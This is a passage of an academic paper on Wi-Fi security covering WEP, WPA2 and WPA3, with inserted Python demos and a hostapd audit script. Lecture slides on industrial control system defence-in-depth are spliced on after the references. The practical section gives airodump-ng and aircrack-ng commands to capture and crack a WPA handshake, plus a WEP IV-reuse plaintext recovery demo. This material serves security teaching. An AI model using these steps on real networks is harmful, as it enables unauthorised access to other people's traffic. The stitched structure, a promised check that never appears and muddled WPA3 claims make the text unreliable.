workable solutions. For cooperative virtual networks in the IoT era, the authors of Alabady et al.
(2020) presented a design of a typical network security paradigm. In addition to a policy to reduce
those risks, that article covers and explores network security vulnerabilities, threats, attacks,
and dangers in switches, firewalls, and routers. A network security model using a static VLAN and
an AAA server with the TACACS+ protocol is presented in Alabady (2008). The planning and execution
of a network security framework using routers and firewalls are presented in Alabady (2009).
Additionally, that paper examined the network security flaws in router and firewall network
devices, the different dangers and how to counteract them, as well as how to stop attacks and
hacker access to the network.

4 802.11 Wireless LAN Security Features


Network security is the procedure used to safeguard digital information assets. The protection
of confidentiality, upkeep of integrity, and guarantee of availability are the main goals of security
Patil et al. (2020). In 802.11 networks, there are three primary ways to prevent unauthorized
access to an AP:

1. Service set identifier (SSID): An SSID associated with an AP or collection of APs can be
used to control network access. A wireless network can be divided into different networks,
each served by one or more APs, using the SSID technique. Each AP is pre-programmed with an
SSID that corresponds to a particular wireless network. This is comparable to how wired LANs
use the idea of a network address. The client's computer needs to be set up with the correct
SSID in order to access a specific wireless network Pamarthi and Narmadha (2022).

2. MAC Address Filtering: The 802.11 network card on a client computer has a unique
MAC address that can be used to identify it. To enhance AP access control, each AP can be
programmed with a list of the MAC addresses of the client computers that are permitted access.
If a client's MAC address is not included in this list, it is not allowed to access the AP, and
the same applies if its configured SSID does not match the SSID of the AP Nazir et al. (2021).

3. Wired Equivalent Privacy (WEP): The IEEE 802.11 WLAN specifications include WEP. Its
main goal is to guarantee data secrecy over wireless networks at a level comparable to wired
local area networks (LANs). Each data packet in WEP contains an integrity check field that is
meant to ensure the data is not altered in transit Zaman et al. (2021), Jilani et al. (2020).
For this, a CRC-32 checksum is used. The WEP protocol consists of three parts: an
initialization vector (IV) of 24 bits, a shared secret key k (40 bits or 104 bits), and the RC4
algorithm, keyed as RC4(IV, k). The shared secret key k (40-bit or 104-bit) is used to reduce
the load on the AP, while presuming that the recipient of the secret key is a trusted individual.
This shared key is never transmitted wirelessly. The installation of this key on workstations is
not covered by the IEEE 802.11 specifications; each WS/AP requires manual installation. The
majority of APs can manage four shared secret keys. The initialization vector is a per-packet
integer that is transmitted unencrypted over the air. Since it is one of the inputs to the RC4
algorithm, it works best if it is produced randomly, but IEEE 802.11 does not specify IV
generation. In practice, many cards produce IVs in a linear manner, that is, 1, 2, 3, etc. A key
stream K with a length equal to the message that will be delivered by the data-link layer is
created using the RC4 algorithm, with the IV and k as its inputs. Initialization vectors are
reused across encrypted packets, the algorithm used for the WEP 'hash' (CRC-32) is not intended
for cryptographic purposes, and the most critical vulnerability is the widespread sharing of the
WEP key. These are only a few of WEP's many weaknesses Butt et al. (2019).
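The WEP description above (per-packet key = 24-bit IV || shared key k, RC4 keystream XORed onto the frame, IVs often generated linearly) is enough to show in code why IV reuse is fatal and how quickly a busy AP runs out of IVs. The following is an added example, not code from the paper: `rc4_keystream` is textbook RC4, `wep_encrypt` reproduces only the IV||key framing the paper describes (no CRC-32 trailer), and the 40-bit key, the IV, the two frames and the packet rate are constructed sample values.

```python
# Added example (not from the paper): the consequence of WEP's 24-bit IV and RC4 keystream reuse.
# rc4_keystream is plain RC4; wep_encrypt is the paper's IV || key framing without the CRC-32 ICV.

def rc4_keystream(key: bytes, length: int) -> bytes:
    """Textbook RC4: key-scheduling pass, then `length` bytes of keystream."""
    S = list(range(256))
    j = 0
    for i in range(256):                                   # KSA
        j = (j + S[i] + key[i % len(key)]) % 256
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for _ in range(length):                                # PRGA
        i = (i + 1) % 256
        j = (j + S[i]) % 256
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) % 256])
    return bytes(out)


def xor_bytes(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def wep_encrypt(iv: bytes, shared_key: bytes, plaintext: bytes) -> bytes:
    """WEP framing as described in the text: per-packet RC4 key is IV (3 bytes, sent in
    the clear) || shared key k (5 or 13 bytes). Encryption and decryption are the same XOR."""
    assert len(iv) == 3 and len(shared_key) in (5, 13)
    return xor_bytes(plaintext, rc4_keystream(iv + shared_key, len(plaintext)))


def plaintext_xor_from_iv_reuse(c1: bytes, c2: bytes) -> bytes:
    """Two frames under the same IV share the keystream, so C1 xor C2 = P1 xor P2.
    Whatever is known about one frame (e.g. a predictable header) is then known about the other,
    with no knowledge of k at all."""
    return xor_bytes(c1, c2)


def iv_exhaustion_seconds(packets_per_second: float) -> float:
    """Seconds until an AP has used every one of the 2^24 IVs and must start repeating,
    even if it generated them perfectly (linear counters repeat just as surely, just predictably)."""
    return 2 ** 24 / packets_per_second


def demo():
    key = bytes.fromhex("0102030405")      # constructed 40-bit WEP key
    iv = b"\x00\x00\x01"                   # a counter-style IV, as the text notes many cards use
    p1 = b"GET /index.html "               # constructed frame 1 (known to the observer)
    p2 = b"POST /login.cgi "               # constructed frame 2 (unknown), same length
    c1 = wep_encrypt(iv, key, p1)
    c2 = wep_encrypt(iv, key, p2)
    leaked = plaintext_xor_from_iv_reuse(c1, c2)
    recovered_p2 = xor_bytes(leaked, p1)   # known p1 strips the XOR, exposing p2
    return recovered_p2, iv_exhaustion_seconds(1000)


if __name__ == "__main__":
    recovered, seconds = demo()
    print("frame 2 recovered without the key:", recovered)
    print("IV space exhausted after %.0f s at 1000 pkt/s" % seconds)
```

At 1,000 packets per second the whole IV space is consumed in under five hours, which is why collecting "more than 10,000 IVs" (Section 5.1) is a realistic wait rather than a theoretical one; a modern cipher mode such as CCMP or GCMP derives a fresh per-session key instead of relying on a 24-bit counter.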

4.1 Security Schemes in WLANs


Wi-Fi Protected Access (WPA), Wired Equivalent Privacy (WEP), Wi-Fi Protected Access 2
(WPA2), and Wi-Fi Protected Access 3 (WPA3) are the latest and most reliable security methods
for WLAN technology. These four security schemes have been implemented for IEEE 802.11
standards. The WPA2 security scheme presents a notable improvement over WPA and WEP because
it uses the Counter Mode Cipher Block Chaining Message Authentication Code Protocol (CCMP),
based on the Advanced Encryption Standard (AES) block cipher, instead of the Rivest Cipher 4
(RC4) stream cipher. However, WPA2 uses a pre-shared key (PSK): if an adversary gets access
to the shared key, he or she can exploit it to mount an attack by decrypting the traffic.
WPA3 solves this problem using the Simultaneous Authentication of Equals (SAE) handshake,
a secure key establishment protocol also called the Dragonfly handshake. SAE relies on
password-based authentication rather than the PSK technique. Moreover, WPA3 exploits the
latest security methods and employs mandatory Protected Management Frames (PMF) to secure
the management frames.
In the case of WPA3, it is likely to be difficult for an adversary to steal the wireless traffic
of clients who are protected by WPA3. Even if an attacker has successfully guessed a client's
password, he cannot derive the session keys used for encryption and decryption. It is worth
mentioning that this work concentrates on the WPA3 security scheme because it compensates for
the issues that were introduced in the previous security schemes in WLANs.


4.2 Ciphering Module of WPA3


WPA3 is a subset and the latest improvement of the 802.11i security standard of WLAN technology
for personal and enterprise networks. WPA3 enhances the encryption of wireless networks
using a new encryption protocol called Galois/Counter Mode Protocol (GCMP) with the Advanced
Encryption Standard (AES) Ahmad et al. (2018). In addition, WPA3 improves the authentication
of wireless networks by using Simultaneous Authentication of Equals (SAE, a secure key
establishment protocol) with a key length of 128 or 192 bits, providing stronger defences
against password guessing than WPA2, which relies on a pre-shared key (PSK). Further, WPA3
uses GCMP and the secure hash algorithm (HMAC-SHA-384) Lamers et al. (2021). Therefore, WPA3
offers encryption (Elliptic Curve Cryptography with a 192-bit security suite), authentication
(SAE), and data integrity (Secure Hash Algorithm: SHA-1 or SHA-2).
WPA3 supports multiple operating modes; the mode that best addresses the design of the
substation network is WPA3 Enterprise mode, because this mode is specialized for the industrial
environment and enforces more robust secret security standards than the other modes Wang et al.
(2020), Baray and Ojha (2021). Opportunistic Wireless Encryption (OWE), when used in enterprise
mode, encrypts the wireless client's interactions with the AP using a different key for each
connection, so every wireless connection has unique encryption. It makes the Protected Management
Frame (PMF) mechanism mandatory to support the protection of management frames between APs and
wireless clients.
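Sections 4.1 and 4.2 make one central claim: under WPA2-PSK the master key is a fixed function of the passphrase and SSID, so knowing the passphrase is knowing the key, whereas SAE mixes in ephemeral secrets so that the password alone does not yield the session key. The example below is added here and is not the paper's code. `wpa2_pmk` is the standard WPA2-PSK derivation from IEEE 802.11i (PBKDF2-HMAC-SHA1, 4096 iterations, SSID as salt, 256-bit output). `toy_sae_like_session` is explicitly not the real Dragonfly/SAE handshake: it is a toy Diffie-Hellman over a small Mersenne prime, used only to exhibit the per-session property; the prime, the generator and the HMAC-based key mixing are constructed for illustration.

```python
import hashlib
import hmac
import secrets

# Added example, not from the paper. wpa2_pmk() is the real WPA2-PSK master-key derivation
# (IEEE 802.11i). toy_sae_like_session() is NOT SAE/Dragonfly: it is a toy Diffie-Hellman
# exchange that only demonstrates why an ephemeral exchange gives a fresh key every session.


def wpa2_pmk(passphrase: str, ssid: str) -> bytes:
    """WPA2-PSK: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes).
    Deterministic: every client and every session with the same credentials shares this key."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


# Toy group (constructed): the Mersenne prime 2^127 - 1 with generator 3. Real SAE uses
# elliptic-curve groups; this size is far too small for anything but illustration.
P = 2 ** 127 - 1
G = 3


def toy_sae_like_session(passphrase: str, ssid: str):
    """Each side contributes an ephemeral secret that is never transmitted; the session key mixes
    the shared Diffie-Hellman value with the password-derived key, so the password only
    authenticates the exchange and does not by itself determine the key.
    Returns (session_key, public_transcript_seen_by_an_observer)."""
    a = secrets.randbelow(P - 2) + 1          # client ephemeral secret
    b = secrets.randbelow(P - 2) + 1          # AP ephemeral secret
    A, B = pow(G, a, P), pow(G, b, P)         # the only values sent over the air
    shared_client = pow(B, a, P)
    shared_ap = pow(A, b, P)
    assert shared_client == shared_ap         # both sides agree without sending the secret
    pmk = wpa2_pmk(passphrase, ssid)          # password-derived key used as the MAC key
    session_key = hmac.new(pmk, shared_client.to_bytes(16, "big"), hashlib.sha256).digest()
    return session_key, (A, B)


def compare(passphrase: str, ssid: str) -> dict:
    """Run the same credentials twice under each scheme. The PSK-derived key is identical
    (so a captured handshake plus the passphrase reproduces it); the ephemeral-exchange key
    differs per session (so past sessions stay protected even if the passphrase leaks later)."""
    psk1, psk2 = wpa2_pmk(passphrase, ssid), wpa2_pmk(passphrase, ssid)
    sess1, _ = toy_sae_like_session(passphrase, ssid)
    sess2, _ = toy_sae_like_session(passphrase, ssid)
    return {"psk_key_repeats": psk1 == psk2, "session_key_repeats": sess1 == sess2}


if __name__ == "__main__":
    print(compare("password", "IEEE"))  # {'psk_key_repeats': True, 'session_key_repeats': False}
```

The IEEE 802.11i test vector (passphrase "password", SSID "IEEE") is used in the check below so the PBKDF2 parameters can be verified against the standard.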

4.3 Wireless Network Security Threats


Because of their broadcast nature, wireless networks carry a greater risk of interception than
wired networks. Here are some of the major threats to a wireless network Kamrul et al. (2022):

1. Sniffing to Eavesdrop: due to the broadcast nature of wireless communication over radio
waves, eavesdroppers can easily pick up unencrypted messages and thereby reach sensitive
network information.

2. Denial of service attacks (DoS): in this type, network attackers flood the network with
a very large number of requests so that the network cannot handle all of them, which leads
to a network crash.

3. Rogue Access Points: this is a technique for building an unsecured access point inside the
firewall in order to open a back door into the trusted network.

4. Network Abuses: authorized users are also able to compromise the security of the
network by abusing it: consuming bandwidth, slowing down connections, and obstructing a
WLAN's overall performance.

5. Brute-Force Attack: this type of attack uses "trial and error" to guess passwords. An
attacker first gathers fundamental information about the user, for example the user's full
name, room number, vehicle number, children's names, etc. The attacker continuously tries
candidate passwords based on the user's personal information until he/she succeeds. This may
take hours, days, months or even years.

5 Practical Work
In this work, ethical hacking is intended to understand the security bugs of IEEE 802.11.


5.1 Under Windows


The equipment used consisted of a WLAN adapter (3Com with Atheros chipset), a personal computer
(P4), a laptop (P4), and access points (D-Link, Micronet, Cisco). Wireless scanning programs like
NetStumbler, Aire1.0 and CommView are also needed for scanning and hacking WIFI signals.
NetStumbler is used for finding AP information like the MAC address of the AP, the SSID, the
WLAN channel, and the SNR of the WLAN, as shown in Figure 1. Here we mention that if the
"disable SSID broadcast" option is selected in the Cisco AP settings, the NetStumbler program could
not find the AP signal, so we used the CommView program to find the WIFI signal.

Figure 1: Output of NetStumbler

CommView gives more options than NetStumbler, like packet capture, a statistics view of how a
station and an AP connect with each other, packets transferred, and other options, as shown in
Figures 2 and 3.

Figure 2: CommView for WiFi

The Atheros driver is used to put the WLAN adapter into monitor mode under Windows.
Figure 4 shows the installation of the Atheros driver. With a D-Link (DWL-2000AP) we made a
simple network and tried to access it. Then, using AiroWizard 1.0 with the Aircrack-ng and
Airodump-ng options, enough data (more than 10,000 IVs) is collected, after which the
Aircrack option should find the AP key. The AP key is shown in ASCII. Figure 5 shows a
capture of the AiroWizard 1.0 program with the AP key found.


Figure 3: Statistics view of how station and AP connect with each other

Figure 4: Wireless network adapter installation

5.2 Under Linux


Linux (BackTrack v2), a live CD that boots directly without any installation, is used for getting
the AP key. This version provides a wide spectrum of hacking programs already installed.
Cracking WPA is different from cracking WEP: it does not depend on collecting packets but
instead on the handshake signal. This can be achieved either actively or passively. "Actively"
means the process is accelerated by de-authenticating an existing wireless client. "Passively"
refers to the act of patiently awaiting a wireless client's WPA network authentication.

Figure 5: AiroWizard Capture with AP Key Found

To put the WLAN adapter into monitor mode the commands below are used:
# wlanconfig ath0 create wlandev wifi0 wlanmode monitor
# ifconfig ath0 up
For finding wireless APs the following command is used:
# iwlist ath0 scan
Figure 6 shows the results of the scan for WLAN networks.

Figure 6: Scanning for WLAN Networks

Then, to start airodump-ng to collect the authentication handshake, we used the command
# airodump-ng -c 2 --bssid 00:11:95:3C:2A:36 -w work ath0
The purpose of this step is to capture the 4-way authentication handshake for the AP we
are interested in. Now to find the AP key we used the command
# aircrack-ng -w 1.lst work-01.cap
Figure 7 shows the capture of BackTrack v2 after finding the AP key.

Figure 7: Capture of Back Track V2 after Finding the AP Key

6 Recommendations and Conclusions Remarks


Although some wireless protocols have major security issues, some methods may be applied
to secure wireless networks, which are listed below:

1. Enable WPA encryption instead of WEP: Weaknesses in the 802.11 WEP (Wired
Equivalent Privacy) encryption make it very simple for a determined user with the correct
tools to break the encryption and access the wireless network. WPA (Wi-Fi Protected
Access) is a superior method of WLAN security. Since WPA doesn't restrict your password
characters to 0-9 and A-F like WEP does, it offers far better security and is simpler to
use. A more recent version, WPA3, is found in newer hardware and provides even stronger
encryption.

2. Use a strong encryption protocol: Using a recent encryption protocol such as WPA3 is
recommended because the old protocols such as WEP and WPA are vulnerable to attacks, as was
demonstrated in the practical part of this work.

3. Change the Administrator Password: Devices which serve as wireless access points
often come with a default password. Many manufacturers' default passwords are well
known and can be used to log into a network without permission. Therefore, change the
administrator password to one of at least 8 characters including special symbols (such as #, $,
and &). Also, avoid using personal information such as a birth date.

4. Keep the Access Point Software Up to Date: The maker of the wireless access
point sometimes offers software updates for the device to fix faults. It is highly advised to
frequently check the manufacturer's website for any software updates for the device.

5. Reduce RF transmission power to the minimum level necessary: A common measure used to
prevent an attack is turning down the power on the AP (if an internal WLAN network is used).
By turning the power down, the range of the AP signal is reduced and hence the probability of
an outsider attack.

6. Use directional antennas: The propagation of RF signals can be difficult to control
and frequently isn't practicable. Usually, the RF energy will spread outside the stations'
operating range. Using directional antennas on the access points is an additional security
measure on top of limiting transmission power levels. The majority of access points
ship with omnidirectional antennas, which emit the RF signal spherically with equal power in
all directions. To stop RF signals from spreading, directional antennas direct the energy in
one chosen direction.

7. MAC filtering: When this low-level security control is implemented on the access point,
only stations with specific MAC addresses will be able to connect with the access point.
By doing so, unauthorized access will be reduced.

8. Change the encryption keys regularly: In order to prevent a compromised network
from remaining compromised indefinitely, encryption keys should be changed. Even
though there's always a chance that a hacker may be able to crack the encryption key a
second time, changing keys gives them a little less incentive.

9. Disable Beacon Packets: Some APs have a setting that prohibits the AP from periodically
broadcasting beacon packets to announce its presence. Before responding to traffic,
these APs demand that wireless network cards use the same SSID. This feature stops
some WLAN scanning programs from being used by hackers.
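Recommendations 1, 2, 3, 7 and 9 above translate directly into access point configuration checks. The script below is an added example, not from the paper: it parses a hostapd-style configuration and reports which recommendations it violates, with a WEP configuration beside a WPA3-SAE one. The hostapd option names (`wpa`, `wpa_key_mgmt`, `rsn_pairwise`, `ieee80211w`, `sae_password`, `wpa_passphrase`, `macaddr_acl`, `accept_mac_file`, `ignore_broadcast_ssid`, `wep_key0`) are real hostapd keys; both configurations are constructed samples, and the passphrase in the hardened one is a placeholder.

```python
# Added example (not from the paper): audit a hostapd-style AP configuration against
# recommendations 1, 2, 3, 7 and 9. The two configurations below are constructed samples.

WEAK_CONF = """\
interface=wlan0
ssid=OfficeNet
# legacy WEP with a 40-bit key, SSID broadcast on, no MAC ACL, no PMF
wep_default_key=0
wep_key0=0102030405
"""

HARDENED_CONF = """\
interface=wlan0
ssid=OfficeNet
wpa=2
wpa_key_mgmt=SAE
rsn_pairwise=CCMP
ieee80211w=2
sae_password=Placeholder#Pass$42
macaddr_acl=1
accept_mac_file=/etc/hostapd/allowed.macs
ignore_broadcast_ssid=1
"""

SPECIAL = set("#$&!@%^*()-_+=")   # "special symbols (such as #, $, and &)" from recommendation 3


def parse_hostapd(text: str) -> dict:
    """hostapd.conf is key=value per line; blank lines and # comments are ignored."""
    conf = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        key, value = line.split("=", 1)
        conf[key.strip()] = value.strip()
    return conf


def password_ok(secret: str) -> bool:
    """Recommendation 3: at least 8 characters and at least one special symbol."""
    return len(secret) >= 8 and any(c in SPECIAL for c in secret)


def audit(conf: dict) -> list:
    """Return (code, message) findings; an empty list means every check passed."""
    findings = []
    uses_wep = any(k.startswith("wep_") for k in conf)
    if uses_wep:
        findings.append(("wep", "WEP keys configured; WEP is broken (rec. 1)"))
    wpa = conf.get("wpa")
    if wpa is None and not uses_wep:
        findings.append(("open", "no wpa= setting: unencrypted open network (rec. 1)"))
    elif wpa in ("1", "3"):
        findings.append(("wpa1", "legacy WPA (wpa=%s) still allowed (rec. 2)" % wpa))
    for key in ("wpa_pairwise", "rsn_pairwise"):
        if "TKIP" in conf.get(key, "").split():
            findings.append(("tkip", "%s allows TKIP; use CCMP or GCMP only (rec. 2)" % key))
    if "SAE" not in conf.get("wpa_key_mgmt", "").split():
        findings.append(("no-sae", "WPA3-SAE not enabled in wpa_key_mgmt (rec. 2)"))
    if conf.get("ieee80211w") != "2":
        findings.append(("no-pmf", "protected management frames not required (ieee80211w=2) (rec. 2)"))
    secret = conf.get("sae_password") or conf.get("wpa_passphrase")
    if secret is not None and not password_ok(secret):
        findings.append(("weak-pass", "passphrase shorter than 8 chars or without a special symbol (rec. 3)"))
    if conf.get("macaddr_acl") != "1":
        findings.append(("no-mac-acl", "MAC address filtering not enforced (macaddr_acl=1) (rec. 7)"))
    if conf.get("ignore_broadcast_ssid", "0") == "0":
        findings.append(("ssid-bcast", "SSID is announced in beacons (rec. 9)"))
    return findings


def audit_text(text: str) -> list:
    return audit(parse_hostapd(text))


if __name__ == "__main__":
    for name, conf in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(name, [code for code, _ in audit_text(conf)])
```

The weak configuration trips five checks (WEP, no SAE, no PMF, no MAC ACL, SSID broadcast); the hardened one trips none. MAC filtering and SSID hiding are kept as checks because the paper lists them, but note that the paper itself calls MAC filtering a "low-level" control: neither replaces WPA3 with PMF, they only raise the bar slightly.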

References
Ahmad, N., Wei, L. M., and Jabbar, M. H. (2018). Advanced Encryption Standard with Galois
Counter Mode using field programmable gate array. In Journal of Physics: Conference Series,
volume 1019, page 012008. IOP Publishing.

Alabady, S. A. (2008). Design and implementation of a network security model using static VLAN
and AAA server. In 3rd IEEE International Conference on Information and Communication
Technologies: From Theory to Applications, 2008. ICTTA 2008., pages 1–6.

Alabady, S. A. (2009). Design and implementation of a network security model for cooperative
network. International Arab Journal of e-Technology, 1(2):26–36.

Alabady, S. A., Al-Turjman, F., and Din, S. (2020). A novel security model for cooperative
virtual networks in the IoT era. International Journal of Parallel Programming, 48(2):280–
295.

Alabady, S. A. and Salleh, M. (2013). Overview of wireless mesh networks. Journal of Commu-
nications, 8(9):134–144.


Anitha, G., Nirmala, P., Ramesh, S., Tamilselvi, M., and Ramkumar, G. (2022). A novel data
communication with security enhancement using threat management scheme over wireless mo-
bile networks. In IEEE International Conference on Advances in Computing, Communication
and Applied Informatics (ACCAI), pages 1–6.

Badholia, A., Verma, V., and Kashyap, S. K. (2019). WEP, WAP and WAP2 wireless network
security protocol: A compact algorithm (wireless network security protocol). In IEEE
International Conference on Computing, Communication, and Intelligent Systems (ICCCIS),
pages 239–243.

Baray, E. and Ojha, N. K. (2021). WLAN security protocols and WPA3 security approach
measurement through aircrack-ng technique. In 5th IEEE International Conference on Computing
Methodologies and Communication (ICCMC), pages 23–30.

Bendale, S. P. and Prasad, J. R. (2018). Security threats and challenges in future mobile wireless
networks. In IEEE Global Conference on Wireless Computing and Networking (GCWCN),
pages 146–150.

Butt, S. A., Diaz-Martinez, J. L., Jamal, T., Ali, A., De-La-Hoz-Franco, E., and Shoaib, M.
(2019). IoT smart health security threats. In 19th IEEE International Conference on
Computational Science and its Applications (ICCSA), pages 26–31.

Chen, J., Yang, T., He, B., and He, L. (2021). An analysis and research on wireless network
security dataset. In IEEE International Conference on Big Data Analysis and Computer
Science (BDACS), pages 80–83.

Faika, T., Kim, T., Ochoa, J., Khan, M., Park, S.-W., and Leung, C. S. (2019). A blockchain-
based Internet of Things (IoT) network for security-enhanced wireless battery management
systems. In IEEE Industry Applications Society Annual Meeting, pages 1–6.

Gupta, A. and Jha, R. K. (2015). Security threats of wireless networks: A survey. In IEEE
International Conference on Computing, Communication and Automation, pages 389–395.

He, D., Li, X., Chan, S., Gao, J., and Guizani, M. (2019). Security analysis of a space-based
wireless network. IEEE Network, 33(1):36–43.

Hoseini, S. A., Bouhafs, F., and den Hartog, F. (2022). A practical implementation of physical
layer security in wireless networks. In IEEE 19th Annual Consumer Communications and
Networking Conference (CCNC), pages 1–4.

Jilani, S. A., Koner, C., and Nandi, S. (2020). Security in wireless sensor networks: attacks
and evasion. In IEEE National conference on emerging trends on sustainable technology and
engineering applications (NCETSTEA), pages 1–5.

Kamrul, H. M., Ghazal, T. M., Saeed, R. A., Pandey, B., Gohel, H., Eshmawi, A., Abdel-Khalek,
S., and Alkhassawneh, H. M. (2022). A review on security threats, vulnerabilities, and counter
measures of 5g enabled internet-of-medical-things. IET Communications, 16(5):421–432.

Kaur, R. and Sandhu, J. K. (2021). A study on security attacks in wireless sensor network.
In IEEE International conference on advance computing and innovative technologies in engi-
neering (ICACITE), pages 850–855.

Lamers, E., Dijksman, R., van der Vegt, A., Sarode, M., and de Laat, C. (2021). Securing home
wi-fi with wpa3 personal. In IEEE 18th Annual Consumer Communications and Networking
Conference (CCNC), pages 1–8.

218
S.A. ALABADY et al. ENHANCING WIRELESS NETWORK SECURITY VIA ETHICAL HACKING...

Lin, Y. and Chang, J. (2019). Improving wireless network security based on radio fingerprint-
ing. In IEEE 19th International Conference on Software Quality, Reliability and Security
Companion (QRS-C), pages 375–379.

Liu, Y. (2022). Security in wireless networks: Analysis of wi-fi security and attack cases study. In
IEEE International Conference on Artificial Intelligence in Everything (AIE), pages 476–481.

Maesaroh, S., Kusumaningrum, L., Sintawana, N., Lazirkha, D. P., and Dinda, R. (2022).
Wireless network security design and analysis using wireless intrusion detection system. In-
ternational Journal of Cyber and IT Service Management, 2(1):30–39.

Mao, Q., Hu, F., and Hao, Q. (2018). Deep learning for intelligent wireless networks: A com-
prehensive survey. IEEE Communications Surveys and Tutorials, 20(4):2595–2621.

Michael, S. (2002). Hacking the invisible network insecurities in 802.11 x. iAlert White paper,
pages 1–35.

Nazir, R., Laghari, A. A., Kumar, K., David, S., and Ali, M. (2021). Survey on wireless network
security. Archives of Computational Methods in Engineering, pages 1–20.

Pamarthi, S. and Narmadha, R. (2022). Literature review on network security in wireless mobile
ad-hoc network for iot applications: Network attacks and detection mechanisms. International
Journal of Intelligent Unmanned Systems, 10(4):482–506.

Patil, B., Kharade, K., and Kamat, R. (2020). Investigation on data security threats and
solutions. International Journal of Innovative Science and Research Technology, 5(1):79–83.

Wang, L., Yang, J., and Wan, P.-J. (2020). Educational modules and research surveys on critical
cybersecurity topics. International Journal of Distributed Sensor Networks, 16(9):1–18.

Wu, H. and Wu, H. (2021). Research on computer network information security problems and
prevention based on wireless sensor network. In IEEE Asia-Pacific Conference on Image
Processing, Electronics and Computers (IPEC), pages 1015–1018.

Zaman, S., Alhazmi, K., Aseeri, M. A., Ahmed, M. R., Khan, R. T., Kaiser, M. S., and Mahmud,
M. (2021). Security threats and artificial intelligence based countermeasures for internet of
things networks: a comprehensive survey. IEEE Access, 9:94668–94690.

219
UFCF7P-15-M Critical Systems Security

UFCF7P-15-M CRITICAL SYSTEMS SECURITY
Defence-in-depth

RECAP

Intelligence-driven computer network defence

• Kill chain model – the basis of intelligence-driven computer network defence
• Kill chain analysis illustrates that the adversary must progress successfully through each stage of the chain before it can achieve its desired objective; just one mitigation disrupts the chain and the adversary [1].
• Objectives:
– Identify phases of intrusion.
– Map adversary kill chain indicators to defender courses of action.
– Identify patterns that link individual intrusions into broader campaigns.
– Understand the iterative nature of intelligence.

Indicators and the indicator life cycle

• The fundamental element of intelligence in the Cyber Kill Chain model is the indicator: any piece of information that objectively describes an intrusion.
• Three indicator types:
– Atomic
– Computed
– Behavioural

Atomic indicators
• Atomic indicators are those which cannot be broken down into smaller parts and retain their meaning in the context of an intrusion.
• Typical examples here are IP addresses, email addresses and vulnerability identifiers.

[Figure: three sample atomic indicators – an email address, the IP address 192.168.1.5 and the vulnerability identifier CVE-1999-0067]

More on CVE: https://cve.mitre.org/

Computed indicators
• Computed indicators are those which are derived from data involved in an incident.
• Common computed indicators include hash values and regular expressions.

Behavioural indicators
• Behavioural indicators are collections of computed and atomic indicators, often subject to qualification by quantity and possibly combinatorial logic.
• Example:
• “the intruder would initially use a backdoor which generated network traffic matching [regular expression] at the rate of [some frequency] to [some IP address], and then replace it with one matching the [MD5 hash value] once access was established”

ICS Cyber kill chain model: Stage 1

ICS Cyber kill chain model: Stage 2
This week

• ICS Security Architecture
• Network segmentation
• Boundary protection
• Firewalls
• Network segregation
• Defence-in-depth
• ISA/IEC 62443-3-2
• In the tutorial

ICS Security Architecture

• Separate corporate network from ICS network
• If the networks must be connected, only minimal (single if possible) connections should be allowed, and the connection should be through a firewall and a DMZ.

Network segmentation and segregation

• Operational risk analysis should be performed to determine critical parts of the ICS network and define segmentation (partitioning the network into smaller networks).
• Segmentation establishes security domains, typically defined as being managed by the same authority, enforcing the same policy, and having a uniform level of trust.
• Goal: Minimise access to sensitive information, ICS communication and equipment configuration.

Network segmentation and segregation

• Traditionally, network segmentation and segregation is implemented at the gateway between domains.

[Figure: domains separated at gateways – Internet, corporate LANs, operational DMZs, operational LANs, control LANs]

Network segmentation and segregation

Common technologies and methods:
• Logical network separation enforced by encryption or network device-enforced partitioning (VLANs, VPNs, unidirectional gateways)
• Physical network separation to completely prevent any interconnectivity of traffic between domains.
• Network traffic filtering using a variety of technologies at various network layers to enforce security requirements and domains (e.g. filtering based on IP, port and/or protocol, or at the application layer).

Defence in depth

• Deploy multiple layers of protection
• Redundancy in case a security measure fails
• Make the attacker’s life difficult!

Network segmentation and segregation - Defence in depth

Four common themes that implement the concept of defense-in-depth by providing for good network segmentation and segregation:
1) Apply technologies at more than just the network layer.
2) Use the principles of least privilege and need‐to‐know.
3) Separate information and infrastructure based on security requirements.
4) Implement whitelisting instead of blacklisting.

Boundary protection (data transactions between network segments)

Control the flow of information between interconnected security domains.
Boundary protection controls include: gateways, routers, firewalls, DMZs, network-based malicious code analysis and virtualisation systems, intrusion detection systems (network and host-based), encrypted tunnels, managed interfaces, mail gateways, and unidirectional gateways (e.g. data diodes).
Boundary protection devices determine whether data transfer is permitted, often by examining the data or associated metadata.

Boundary protection (data transactions between network segments)

• A common architectural construct is the DMZ: a host or network segment inserted as a “neutral zone” between security domains.
• Deny communications traffic by default and allow communications traffic by exception (white-listing policy).
• Limit direct connectivity by implementing proxy servers that act as an intermediary for external domains requesting information system resources (e.g., files, connections, or services) from the ICS domain.
• Deep packet inspection firewalls and XML gateways.

Boundary protection (data transactions between network segments)

• Allow communication only between authorised and authenticated source and destination address pairs.
• Extending the DMZ concept to other separate subnetworks is useful, for instance isolating ICS to prevent adversaries from discovering the analysis and forensics techniques of organisations.
• Enforce physical access control to limit authorised access to ICS components.
• Conceal network addresses of ICS components from discovery (e.g., network address not published or entered in domain name systems), requiring prior knowledge for access.

Boundary protection (data transactions between network segments)

• Disable control and troubleshooting services and protocols, especially those employing broadcast messaging, which can facilitate network exploration.
• Disable feedback (e.g., non-verbose mode) to senders when there is a failure in protocol format validation, to prevent adversaries from obtaining information.
• Implement one-way data flow, especially between different security domains.
• Establish passive monitoring of ICS networks to actively detect anomalous communications and provide alerts.

Boundary protection (data transactions between network segments)

Network and ICS security architects must decide:
• which domains are to be permitted direct communication,
• the policies governing permitted communication,
• the devices to be used to enforce the policy, and
• the topology for provisioning and implementing these decisions, which are typically based on the trust relationship between domains.

Firewalls

• Not just for the connection to the Internet.
• Restrict ICS inter-subnetwork communications; prevent unauthorised access to the respective systems and resources within the more sensitive areas.

Types of Firewalls:
- Packet Filtering Firewalls
- Stateful Inspection Firewalls
- Application-Proxy Gateway Firewalls

Network segregation

Dual-Homed Computer/Dual Network Interface Cards (NIC)
• No systems other than firewalls should be configured as dual-homed to span both the control and corporate networks.
• All connections between the control network and the corporate network should be through a firewall.
